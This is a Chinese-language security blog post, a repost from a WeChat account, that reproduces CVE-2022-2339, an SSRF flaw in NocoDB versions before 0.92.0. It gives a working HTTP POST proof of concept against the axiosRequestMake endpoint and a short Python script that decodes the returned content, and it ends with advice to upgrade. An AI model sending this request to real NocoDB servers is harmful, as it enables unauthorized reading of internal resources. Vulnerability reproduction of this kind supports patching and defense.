【漏洞复现】NocoDB SSRF漏洞(CVE-2022-2339)

admin 2023年11月12日19:52:05评论32 views字数 679阅读2分15秒阅读模式
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

NocoDB是一个开源Airtable 替代品。将任何 MySql、PostgreSql、Sql Server、Sqlite 和MariaDb 转换为智能电子表格。

官网:
https://www.nocodb.com/
漏洞编号:
CVE-2022-2339
影响范围:

NocoDB < 0.92.0


复现环境:

NocoDB 0.91.10
0X02 漏洞复现
注:读取内容较多时,可能会导致服务器卡死。
【漏洞复现】NocoDB SSRF漏洞(CVE-2022-2339)
【漏洞复现】NocoDB SSRF漏洞(CVE-2022-2339)
POC:
POST /api/v1/db/meta/axiosRequestMake HTTP/1.1Host: 192.168.245.137:8888Content-Type: application/jsonContent-Length: 51

{"apiMeta":{"url":"http://127.0.0.1:9999/123.ods"}}

注:需要一个文件后缀 .csv/.xls/.slxs/.slxm/.ods/.ots,只能输入127.0.0.1,其他地址提示不允许。
【漏洞复现】NocoDB SSRF漏洞(CVE-2022-2339)
【漏洞复现】NocoDB SSRF漏洞(CVE-2022-2339)
【漏洞复现】NocoDB SSRF漏洞(CVE-2022-2339)
读取文件:
注:读取内容较多时,可能会导致服务器卡死。
【漏洞复现】NocoDB SSRF漏洞(CVE-2022-2339)
【漏洞复现】NocoDB SSRF漏洞(CVE-2022-2339)
解码脚本:
#!/usr/bin/python

str1 = []#需解码内容str2 = ""for i in range(len(str1)):   str2 = str2 + chr(str1[i])print(str2)
【漏洞复现】NocoDB SSRF漏洞(CVE-2022-2339)

0X03 修复建议

更新至最新版!

原文始发于微信公众号(皓月的笔记本):【漏洞复现】NocoDB SSRF漏洞(CVE-2022-2339)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月12日19:52:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】NocoDB SSRF漏洞(CVE-2022-2339)http://cn-sec.com/archives/2199253.html

发表评论

匿名网友 填写信息